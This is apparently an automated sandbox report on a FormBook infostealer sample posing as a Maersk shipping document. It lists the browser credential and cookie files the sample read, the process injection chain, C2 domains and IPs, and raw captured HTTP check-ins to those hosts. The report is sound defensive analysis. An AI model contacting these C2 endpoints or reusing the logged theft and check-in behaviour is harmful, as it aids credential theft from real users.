                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exe; Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

                Stealing of Sensitive Information

                Source: Yara match; File source: 3.2.MAERSK LINE SHIPPING DOC_4253.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara match; File source: 3.2.MAERSK LINE SHIPPING DOC_4253.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara match; File source: 00000003.00000002.1886846663.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match; File source: 00000009.00000002.2537167858.0000000001360000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match; File source: 00000003.00000002.1893908938.0000000001AC0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match; File source: 00000006.00000002.2536674826.0000000000E10000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match; File source: 00000006.00000002.2536229023.0000000000960000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match; File source: 00000006.00000002.2536855237.0000000000E60000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match; File source: 00000003.00000002.1894488760.0000000001C80000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match; File source: 00000005.00000002.2537606826.0000000002280000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: C:\Windows\SysWOW64\tzutil.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
                Source: C:\Windows\SysWOW64\tzutil.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State
                Source: C:\Windows\SysWOW64\tzutil.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
                Source: C:\Windows\SysWOW64\tzutil.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local State
                Source: C:\Windows\SysWOW64\tzutil.exe; File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
                Source: C:\Windows\SysWOW64\tzutil.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                Source: C:\Windows\SysWOW64\tzutil.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies
                Source: C:\Windows\SysWOW64\tzutil.exe; File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
                Source: C:\Windows\SysWOW64\tzutil.exe; Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\

                Remote Access Functionality

                Source: Yara match; File source: 3.2.MAERSK LINE SHIPPING DOC_4253.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara match; File source: 3.2.MAERSK LINE SHIPPING DOC_4253.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara match; File source: 00000003.00000002.1886846663.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match; File source: 00000009.00000002.2537167858.0000000001360000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match; File source: 00000003.00000002.1893908938.0000000001AC0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match; File source: 00000006.00000002.2536674826.0000000000E10000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match; File source: 00000006.00000002.2536229023.0000000000960000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match; File source: 00000006.00000002.2536855237.0000000000E60000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match; File source: 00000003.00000002.1894488760.0000000001C80000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match; File source: 00000005.00000002.2537606826.0000000002280000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                | Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact |
                |---|---|---|---|---|---|---|---|---|---|---|---|---|---|
                | Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts | Windows Management Instrumentation | 1 DLL Side-Loading | 412 Process Injection | 1 Masquerading | 1 OS Credential Dumping | 121 Security Software Discovery | Remote Services | 1 Email Collection | 1 Encrypted Channel | Exfiltration Over Other Network Medium | Abuse Accessibility Features |
                | Credentials | Domains | Default Accounts | Scheduled Task/Job | Boot or Logon Initialization Scripts | 1 Abuse Elevation Control Mechanism | 1 Disable or Modify Tools | LSASS Memory | 2 Process Discovery | Remote Desktop Protocol | 1 Archive Collected Data | 3 Ingress Tool Transfer | Exfiltration Over Bluetooth | Network Denial of Service |
                | Email Addresses | DNS Server | Domain Accounts | At | Logon Script (Windows) | 1 DLL Side-Loading | 41 Virtualization/Sandbox Evasion | Security Account Manager | 41 Virtualization/Sandbox Evasion | SMB/Windows Admin Shares | 1 Data from Local System | 4 Non-Application Layer Protocol | Automated Exfiltration | Data Encrypted for Impact |
                | Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | Login Hook | 412 Process Injection | NTDS | 1 Application Window Discovery | Distributed Component Object Model | Input Capture | 4 Application Layer Protocol | Traffic Duplication | Data Destruction |
                Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                Deobfuscate/Decode Files or Information
                LSA Secrets2
                File and Directory Discovery
                SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                Abuse Elevation Control Mechanism
                Cached Domain Credentials113
                System Information Discovery
                VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items4
                Obfuscated Files or Information
                DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job12
                Software Packing
                Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt1
                Timestomp
                /etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron1
                DLL Side-Loading
                Network SniffingNetwork Service DiscoveryShared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
                Behavior graph (ID: 1572390, Sample: MAERSK LINE SHIPPING DOC_4253.exe, Startdate: 10/12/2024, Architecture: WINDOWS, Score: 100). Process chain: MAERSK LINE SHIPPING DOC_4253.exe (started) -> MAERSK LINE SHIPPING DOC_4253.exe (started) -> FeNbdhmZHKN.exe (injected) -> tzutil.exe (started) -> FeNbdhmZHKN.exe (injected) and firefox.exe (started). The second FeNbdhmZHKN.exe instance contacts www.expancz.top (107.155.56.30), www.070001325.xyz (161.97.142.144) and dns.ladipage.com (13.228.81.39).

                Source | Detection | Scanner | Label | Link
                MAERSK LINE SHIPPING DOC_4253.exe | 26% | ReversingLabs | |
                MAERSK LINE SHIPPING DOC_4253.exe | 100% | Joe Sandbox ML | |
                No Antivirus matches
                No Antivirus matches
                No Antivirus matches
                Source | Detection | Scanner | Label | Link
                http://www.taxiquynhonnew.click | 0% | Avira URL Cloud | safe |
                http://www.070001325.xyz/gebt/?2z=xX0xzrrpPjmP&jHm4GXr=vv4Z5oAEVW8Fnw5+v3rC78A1apnlABoa7eW6m5kMXrJjwDKHwLvNIdd6hCLbwWC7cjqqbjXxYb26MUHQV2edmwk8JqRcnVFwPpJc4SLJsBBMTTXejr8neKA= | 0% | Avira URL Cloud | safe |
                http://www.taxiquynhonnew.click/y49d/?jHm4GXr=m6DqfWTYFUU8GAEJaQ04TZKKVQt9iuan9ImFwYYAXgcLCIKDKHWgUkMantPJ7uipU91pPV1usxBfeqldUzKMcDyYrnyrhYUq4o7lYpBsWzTksb8l1Yx6Eo8=&2z=xX0xzrrpPjmP | 100% | Avira URL Cloud | malware |
                https://www.taxiquynhonnew.click/y49d/?jHm4GXr=m6DqfWTYFUU8GAEJaQ04TZKKVQt9iuan9ImFwYYAXgcLCIKDKHWgU | 100% | Avira URL Cloud | malware |
                https://l3filejson4dvd.josyliving.com/favicon.ico | 0% | Avira URL Cloud | safe |
                https://dq0ib5xlct7tw.cloudfront.net/ | 0% | Avira URL Cloud | safe |
                http://www.taxiquynhonnew.click/y49d/ | 100% | Avira URL Cloud | malware |
                Name | IP | Active | Malicious | Antivirus Detection | Reputation
                www.expancz.top | 107.155.56.30 | true | false | | high
                dns.ladipage.com | 13.228.81.39 | true | false | | high
                www.070001325.xyz | 161.97.142.144 | true | false | | high
                www.epitomize.shop | unknown | unknown | false | | unknown
                www.taxiquynhonnew.click | unknown | unknown | false | | unknown
                Name | Malicious | Antivirus Detection | Reputation
                http://www.taxiquynhonnew.click/y49d/?jHm4GXr=m6DqfWTYFUU8GAEJaQ04TZKKVQt9iuan9ImFwYYAXgcLCIKDKHWgUkMantPJ7uipU91pPV1usxBfeqldUzKMcDyYrnyrhYUq4o7lYpBsWzTksb8l1Yx6Eo8=&2z=xX0xzrrpPjmP | true | Avira URL Cloud: malware | unknown
                http://www.taxiquynhonnew.click/y49d/ | true | Avira URL Cloud: malware | unknown
                http://www.070001325.xyz/gebt/?2z=xX0xzrrpPjmP&jHm4GXr=vv4Z5oAEVW8Fnw5+v3rC78A1apnlABoa7eW6m5kMXrJjwDKHwLvNIdd6hCLbwWC7cjqqbjXxYb26MUHQV2edmwk8JqRcnVFwPpJc4SLJsBBMTTXejr8neKA= | true | Avira URL Cloud: safe | unknown
                IP | Domain | Country | Flag | ASN | ASN Name | Malicious
                161.97.142.144 | www.070001325.xyz | United States | | 51167 | CONTABODE | false
                13.228.81.39 | dns.ladipage.com | United States | | 16509 | AMAZON-02US | false
                107.155.56.30 | www.expancz.top | United States | | 135377 | UHGL-AS-APUCloudHKHoldingsGroupLimitedHK | false
                                                  Joe Sandbox version:41.0.0 Charoite
                                                  Analysis ID:1572390
                                                  Start date and time:2024-12-10 14:20:00 +01:00
                                                  Joe Sandbox product:CloudBasic
                                                  Overall analysis duration:0h 8m 49s
                                                  Hypervisor based Inspection enabled:false
                                                  Report type:full
                                                  Cookbook file name:default.jbs
                                                  Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                  Number of analysed new started processes analysed:11
                                                  Number of new started drivers analysed:0
                                                  Number of existing processes analysed:0
                                                  Number of existing drivers analysed:0
                                                  Number of injected processes analysed:2
                                                  Technologies:
                                                  • HCA enabled
                                                  • EGA enabled
                                                  • AMSI enabled
                                                  Analysis Mode:default
                                                  Analysis stop reason:Timeout
                                                  Sample name:MAERSK LINE SHIPPING DOC_4253.exe
                                                  Detection:MAL
                                                  Classification:mal100.troj.spyw.evad.winEXE@7/2@6/3
                                                  EGA Information:
                                                  • Successful, ratio: 75%
                                                  HCA Information:
                                                  • Successful, ratio: 96%
                                                  • Number of executed functions: 193
                                                  • Number of non-executed functions: 306
                                                  Cookbook Comments:
                                                  • Found application associated with file extension: .exe
                                                  • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                                                  • Excluded IPs from analysis (whitelisted): 13.107.246.63, 23.36.245.152, 20.12.23.50
                                                  • Excluded domains from analysis (whitelisted): fs.microsoft.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                  • Execution Graph export aborted for target FeNbdhmZHKN.exe, PID 6316 because it is empty
                                                  • Not all processes were analyzed, report is missing behavior information
                                                  • Report creation exceeded maximum time and may have missing disassembly code information.
                                                  • VT rate limit hit for: MAERSK LINE SHIPPING DOC_4253.exe
                Time | Type | Description
                08:20:55 | API Interceptor | 32x Sleep call for process: MAERSK LINE SHIPPING DOC_4253.exe modified
                08:22:31 | API Interceptor | 58x Sleep call for process: tzutil.exe modified
                                                  Process:C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exe
                                                  File Type:ASCII text, with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):1415
                                                  Entropy (8bit):5.352427679901606
                                                  Encrypted:false
                                                  SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPE4KMRaKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPHKMRatHo6hAH4
                                                  MD5:97AD91F1C1F572C945DA12233082171D
                                                  SHA1:D5E33DDAB37E32E416FC40419FB26B3C0563519D
                                                  SHA-256:3F64591E0447E6F5034BC69A8A8D4C7ED36DAC5FE1E408401AE1B98F0D915F7E
                                                  SHA-512:8FAEED342DADC17571F711DDC1BE67C79A51CA5BD56B5DA13E472ED45FC4EC6F1DC704BA92E81E97F5ECFD73F3D88F9B9CD9AE4EADDF993BFF826627215FBBCE
                                                  Malicious:true
                                                  Reputation:moderate, very likely benign file
                                                  Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Data, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Data\1b8c564fd69668e6e62d136259980d9e\System.Data.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fc
                                                  Process:C:\Windows\SysWOW64\tzutil.exe
                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 7, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 7
                                                  Category:dropped
                                                  Size (bytes):196608
                                                  Entropy (8bit):1.1209935793793442
                                                  Encrypted:false
                                                  SSDEEP:192:r2qAdB9TbTbuDDsnxCkvSAE+WslKOMq+8lZqhAj3NniAGl:r2qOB1nxCkvSAELyKOMq+8lMAjdnG
                                                  MD5:214CFA91B0A6939C4606C4F99C9183B3
                                                  SHA1:A36951EB26E00F95BFD44C0851827A032EAFD91A
                                                  SHA-256:660DE0DCC188B3C35F8693DA4FE3EABD70D55A3AA32B7FDD6353FDBF04F702D7
                                                  SHA-512:E2FA64C41FBE5C576C0D79C6A5DEF0EC0A49BB2D0D862223E761429374294332A5A218E03C78A0D9924695D84B10DC96BCFE7DA0C9972988D33AE7868B107789
                                                  Malicious:false
                                                  Reputation:moderate, very likely benign file
                                                  File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                  Entropy (8bit):7.616900235750765
                                                  TrID:
                                                  • Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                                                  • Win32 Executable (generic) a (10002005/4) 49.75%
                                                  • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                  • Windows Screen Saver (13104/52) 0.07%
                                                  • Generic Win/DOS Executable (2004/3) 0.01%
                                                  File name:MAERSK LINE SHIPPING DOC_4253.exe
                                                  File size:876'544 bytes
                                                  MD5:1175234dabbeab0e4a9ee04802ef57fa
                                                  SHA1:1b66c849b4ca2f01c7c778e4fbf4d91b8302dc09
                                                  SHA256:5ca92658980b5d1f46f53d78202bd40e442163622e2edb5220046f74e5748945
                                                  SHA512:f12ed264cb4d1fdd7143c0f7e4262669233c3e2dd4014694ca9754af082667b99544d9d240668105ab4f7f88c0c1a9072324757181504f5ad4af302defd94191
                                                  SSDEEP:12288:ehM1Tp5XxnOi1S/7LCaMm3ryNv1OpXt6FJFYDdJMiQGKRUq8sVW4NMwy9EXX+F:ZTDQi1m7TMm3owgv+DLQGKuRsZNMwFO
                                                  TLSH:4715E014736ECB16C57947F00A71E6B823796C9AB822D20F6ED9BFDF7875B144A00683
                                                  File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....................0..V...........t... ........@.. ....................................@................................
                                                  Icon Hash:90cececece8e8eb0
                                                  Entrypoint:0x4d7416
                                                  Entrypoint Section:.text
                                                  Digitally signed:false
                                                  Imagebase:0x400000
                                                  Subsystem:windows gui
                                                  Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                  DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                  Time Stamp:0xA3168CF8 [Thu Sep 14 13:34:48 2056 UTC]
                                                  TLS Callbacks:
                                                  CLR (.Net) Version:
                                                  OS Version Major:4
                                                  OS Version Minor:0
                                                  File Version Major:4
                                                  File Version Minor:0
                                                  Subsystem Version Major:4
                                                  Subsystem Version Minor:0
                                                  Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
                                                  Instruction
                                                  jmp dword ptr [00402000h]
                                                  push ebx
                                                  add byte ptr [ecx+00h], bh
                                                  jnc 00007F46691DB042h
                                                  je 00007F46691DB042h
                                                  add byte ptr [ebp+00h], ch
                                                  add byte ptr [ecx+00h], al
                                                  arpl word ptr [eax], ax
                                                  je 00007F46691DB042h
                                                  imul eax, dword ptr [eax], 00610076h
                                                  je 00007F46691DB042h
                                                  outsd
                                                  add byte ptr [edx+00h], dh
                                                  add byte ptr [eax], al
Name                                  Virtual Address  Virtual Size  Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT          0x0              0x0
IMAGE_DIRECTORY_ENTRY_IMPORT          0xd73c1          0x4f          .text
IMAGE_DIRECTORY_ENTRY_RESOURCE        0xd8000          0x5cc         .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION       0x0              0x0
IMAGE_DIRECTORY_ENTRY_SECURITY        0x0              0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC       0xda000          0xc           .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG           0xd4dcc          0x70          .text
IMAGE_DIRECTORY_ENTRY_COPYRIGHT       0x0              0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR       0x0              0x0
IMAGE_DIRECTORY_ENTRY_TLS             0x0              0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG     0x0              0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT    0x0              0x0
IMAGE_DIRECTORY_ENTRY_IAT             0x2000           0x8           .text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT    0x0              0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR  0x2008           0x48          .text
IMAGE_DIRECTORY_ENTRY_RESERVED        0x0              0x0
Name    Virtual Address  Virtual Size  Raw Size  MD5                               Xored PE  ZLIB Complexity      File Type  Entropy              Characteristics
.text   0x2000           0xd543c       0xd5600   2e38decb5f80ce770fcedfd020849cd6  False     0.8357899000439367   data       7.6234510150876185   IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc   0xd8000          0x5cc         0x600     c243ecfbaccc870a0a2f77d118898039  False     0.427734375          data       4.110743151577604    IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc  0xda000          0xc           0x200     12ac662919a8444011ac95123ab9056d  False     0.044921875          data       0.10191042566270775  IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
Name         RVA      Size   Type                                                                               Language  Country  ZLIB Complexity
RT_VERSION   0xd8090  0x33c  data                                                                                                  0.42995169082125606
RT_MANIFEST  0xd83dc  0x1ea  XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators                     0.5489795918367347
DLL          Import
mscoree.dll  _CorExeMain
Timestamp                        SID      Signature                                     Severity  Source IP     Source Port  Dest IP         Dest Port  Protocol
2024-12-10T14:22:11.788102+0100  2050745  ET MALWARE FormBook CnC Checkin (GET) M5      1         192.168.2.11  49868        161.97.142.144  80         TCP
2024-12-10T14:22:11.788102+0100  2855465  ETPRO MALWARE FormBook CnC Checkin (GET) M2   1         192.168.2.11  49868        161.97.142.144  80         TCP
2024-12-10T14:22:29.605213+0100  2855464  ETPRO MALWARE FormBook CnC Checkin (POST) M3  1         192.168.2.11  49908        107.155.56.30   80         TCP
2024-12-10T14:22:32.417853+0100  2855464  ETPRO MALWARE FormBook CnC Checkin (POST) M3  1         192.168.2.11  49914        107.155.56.30   80         TCP
2024-12-10T14:22:35.089801+0100  2855464  ETPRO MALWARE FormBook CnC Checkin (POST) M3  1         192.168.2.11  49921        107.155.56.30   80         TCP
2024-12-10T14:22:37.852826+0100  2050745  ET MALWARE FormBook CnC Checkin (GET) M5      1         192.168.2.11  49928        107.155.56.30   80         TCP
2024-12-10T14:22:37.852826+0100  2855465  ETPRO MALWARE FormBook CnC Checkin (GET) M2   1         192.168.2.11  49928        107.155.56.30   80         TCP
2024-12-10T14:22:45.652104+0100  2855464  ETPRO MALWARE FormBook CnC Checkin (POST) M3  1         192.168.2.11  49947        13.228.81.39    80         TCP
2024-12-10T14:22:48.324205+0100  2855464  ETPRO MALWARE FormBook CnC Checkin (POST) M3  1         192.168.2.11  49954        13.228.81.39    80         TCP
2024-12-10T14:22:50.980272+0100  2855464  ETPRO MALWARE FormBook CnC Checkin (POST) M3  1         192.168.2.11  49961        13.228.81.39    80         TCP
2024-12-10T14:22:53.708458+0100  2050745  ET MALWARE FormBook CnC Checkin (GET) M5      1         192.168.2.11  49969        13.228.81.39    80         TCP
2024-12-10T14:22:53.708458+0100  2855465  ETPRO MALWARE FormBook CnC Checkin (GET) M2   1         192.168.2.11  49969        13.228.81.39    80         TCP
                                                  TimestampSource PortDest PortSource IPDest IP
                                                  Dec 10, 2024 14:22:09.725912094 CET5043153192.168.2.111.1.1.1
                                                  Dec 10, 2024 14:22:10.373446941 CET53504311.1.1.1192.168.2.11
                                                  Dec 10, 2024 14:22:26.843626022 CET6012053192.168.2.111.1.1.1
                                                  Dec 10, 2024 14:22:27.868122101 CET6012053192.168.2.111.1.1.1
                                                  Dec 10, 2024 14:22:27.913952112 CET53601201.1.1.1192.168.2.11
                                                  Dec 10, 2024 14:22:28.008621931 CET53601201.1.1.1192.168.2.11
                                                  Dec 10, 2024 14:22:42.874470949 CET6056053192.168.2.111.1.1.1
                                                  Dec 10, 2024 14:22:43.886528969 CET6056053192.168.2.111.1.1.1
                                                  Dec 10, 2024 14:22:44.000518084 CET53605601.1.1.1192.168.2.11
                                                  Dec 10, 2024 14:22:44.023289919 CET53605601.1.1.1192.168.2.11
                                                  Dec 10, 2024 14:22:58.718369961 CET5959153192.168.2.111.1.1.1
                                                  Dec 10, 2024 14:22:58.954385042 CET53595911.1.1.1192.168.2.11
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Dec 10, 2024 14:22:09.725912094 CET | 192.168.2.11 | 1.1.1.1 | 0x821b | Standard query (0) | www.070001325.xyz | A (IP address) | IN (0x0001) | false
Dec 10, 2024 14:22:26.843626022 CET | 192.168.2.11 | 1.1.1.1 | 0x29c2 | Standard query (0) | www.expancz.top | A (IP address) | IN (0x0001) | false
Dec 10, 2024 14:22:27.868122101 CET | 192.168.2.11 | 1.1.1.1 | 0x29c2 | Standard query (0) | www.expancz.top | A (IP address) | IN (0x0001) | false
Dec 10, 2024 14:22:42.874470949 CET | 192.168.2.11 | 1.1.1.1 | 0x72ca | Standard query (0) | www.taxiquynhonnew.click | A (IP address) | IN (0x0001) | false
Dec 10, 2024 14:22:43.886528969 CET | 192.168.2.11 | 1.1.1.1 | 0x72ca | Standard query (0) | www.taxiquynhonnew.click | A (IP address) | IN (0x0001) | false
Dec 10, 2024 14:22:58.718369961 CET | 192.168.2.11 | 1.1.1.1 | 0xb271 | Standard query (0) | www.epitomize.shop | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Dec 10, 2024 14:22:10.373446941 CET | 1.1.1.1 | 192.168.2.11 | 0x821b | No error (0) | www.070001325.xyz | | 161.97.142.144 | A (IP address) | IN (0x0001) | false
Dec 10, 2024 14:22:27.913952112 CET | 1.1.1.1 | 192.168.2.11 | 0x29c2 | No error (0) | www.expancz.top | | 107.155.56.30 | A (IP address) | IN (0x0001) | false
Dec 10, 2024 14:22:28.008621931 CET | 1.1.1.1 | 192.168.2.11 | 0x29c2 | No error (0) | www.expancz.top | | 107.155.56.30 | A (IP address) | IN (0x0001) | false
Dec 10, 2024 14:22:44.000518084 CET | 1.1.1.1 | 192.168.2.11 | 0x72ca | No error (0) | www.taxiquynhonnew.click | dns.ladipage.com | | CNAME (Canonical name) | IN (0x0001) | false
Dec 10, 2024 14:22:44.000518084 CET | 1.1.1.1 | 192.168.2.11 | 0x72ca | No error (0) | dns.ladipage.com | | 13.228.81.39 | A (IP address) | IN (0x0001) | false
Dec 10, 2024 14:22:44.000518084 CET | 1.1.1.1 | 192.168.2.11 | 0x72ca | No error (0) | dns.ladipage.com | | 18.139.62.226 | A (IP address) | IN (0x0001) | false
Dec 10, 2024 14:22:44.000518084 CET | 1.1.1.1 | 192.168.2.11 | 0x72ca | No error (0) | dns.ladipage.com | | 54.179.173.60 | A (IP address) | IN (0x0001) | false
Dec 10, 2024 14:22:44.023289919 CET | 1.1.1.1 | 192.168.2.11 | 0x72ca | No error (0) | www.taxiquynhonnew.click | dns.ladipage.com | | CNAME (Canonical name) | IN (0x0001) | false
Dec 10, 2024 14:22:44.023289919 CET | 1.1.1.1 | 192.168.2.11 | 0x72ca | No error (0) | dns.ladipage.com | | 54.179.173.60 | A (IP address) | IN (0x0001) | false
Dec 10, 2024 14:22:44.023289919 CET | 1.1.1.1 | 192.168.2.11 | 0x72ca | No error (0) | dns.ladipage.com | | 18.139.62.226 | A (IP address) | IN (0x0001) | false
Dec 10, 2024 14:22:44.023289919 CET | 1.1.1.1 | 192.168.2.11 | 0x72ca | No error (0) | dns.ladipage.com | | 13.228.81.39 | A (IP address) | IN (0x0001) | false
Dec 10, 2024 14:22:58.954385042 CET | 1.1.1.1 | 192.168.2.11 | 0xb271 | Name error (3) | www.epitomize.shop | none | none | A (IP address) | IN (0x0001) | false
                                                  • www.070001325.xyz
                                                  • www.expancz.top
                                                  • www.taxiquynhonnew.click
Session ID: 0 | Source IP: 192.168.2.11 | Source Port: 49868 | Destination IP: 161.97.142.144 | Destination Port: 80 | PID: 732 | Process: C:\Program Files (x86)\WEDCVRceEcoELDgXGOGbIWZniqNToXCsfkMGoBVW\FeNbdhmZHKN.exe
Timestamp: Dec 10, 2024 14:22:10.510483980 CET | Bytes transferred: 545 | Direction: OUT | Data:
GET /gebt/?2z=xX0xzrrpPjmP&jHm4GXr=vv4Z5oAEVW8Fnw5+v3rC78A1apnlABoa7eW6m5kMXrJjwDKHwLvNIdd6hCLbwWC7cjqqbjXxYb26MUHQV2edmwk8JqRcnVFwPpJc4SLJsBBMTTXejr8neKA= HTTP/1.1
                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                  Accept-Language: en-US,en;q=0.9
                                                  Host: www.070001325.xyz
                                                  Connection: close
                                                  User-Agent: Mozilla/5.0 (Linux; Android 5.1; XT1055 Build/LPA23.12-21-1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
Timestamp: Dec 10, 2024 14:22:11.787408113 CET | Bytes transferred: 1236 | Direction: IN | Data:
HTTP/1.1 404 Not Found
                                                  Server: nginx
                                                  Date: Tue, 10 Dec 2024 13:22:11 GMT
                                                  Content-Type: text/html; charset=utf-8
                                                  Content-Length: 2966
                                                  Connection: close
                                                  Vary: Accept-Encoding
                                                  ETag: "66cce1df-b96"


Session ID: 1 | Source IP: 192.168.2.11 | Source Port: 49908 | Destination IP: 107.155.56.30 | Destination Port: 80 | PID: 732 | Process: C:\Program Files (x86)\WEDCVRceEcoELDgXGOGbIWZniqNToXCsfkMGoBVW\FeNbdhmZHKN.exe
Timestamp: Dec 10, 2024 14:22:28.094609022 CET | Bytes transferred: 806 | Direction: OUT | Data:
POST /2gcl/ HTTP/1.1
                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                  Accept-Language: en-US,en;q=0.9
                                                  Accept-Encoding: gzip, deflate, br
                                                  Host: www.expancz.top
                                                  Origin: http://www.expancz.top
                                                  Connection: close
                                                  Content-Type: application/x-www-form-urlencoded
                                                  Content-Length: 204
